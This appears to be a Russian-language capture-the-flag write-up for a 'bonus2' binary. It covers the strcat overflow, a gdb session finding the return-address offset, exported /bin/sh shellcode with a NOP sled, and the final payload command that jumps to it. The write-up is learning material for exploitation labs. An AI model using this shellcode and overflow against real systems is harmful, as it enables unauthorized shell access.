# Bonus 2 - использование strcat


### 1. В коде используется переменная окружения ```LANG```
```c
    lang = getenv("LANG");
    if (lang)
    {
      if (memcmp(lang, "fi", 2) == 0)
        language = 1;
      else if (memcmp(lang, "nl", 2) == 0)
          language = 2;
    }
```
### 2. Первый и второй аргумент соединяются в одну строку, после чего передаются в функцию strcat вместе с приветствием, которое зависит от ```LANG```
```c
 strcat(greeting, msg);
```

### 3. Стандартное переполнение буфера, с помощью которого можно переписать адрес возврата. Высчитываем оффсет в gdb:

```dart
gef➤  set environment LANG fi
gef➤  start aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaa kaaalaaamaaanaaaoaaapaaaqaaara00
[+] Breaking at '{<text variable, no debug info>} 0x8048529 <main>'
gef➤  c
Continuing.
Hyvää päivää aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaara00

Program received signal SIGSEGV, Segmentation fault.
0x61706161 in ?? ()
gef➤  search pattern 0x61706161
[+] Searching for '0x61706161'
[+] Found at offset 58 (little-endian search) likely
[+] Found at offset 59 (big-endian search)
```

### 4. Создаем переменную окружения с шеллкодом
```sh
export shell=`echo -ne '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n'`
```
### 5. Вычисляем адрес переменной окружения и формируем пейлоад
💡 Используем ```LANG=fi```, чтобы получить самое длинное приветствие из имеющихсяc (чтобы мы точно переехали адрес возврата)
```sh
cat | LANG=fi ./bonus2 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaa `python -c 'print "kaaalaaamaaanaaaoa" + "\x23\xff\xff\xbf"'`
```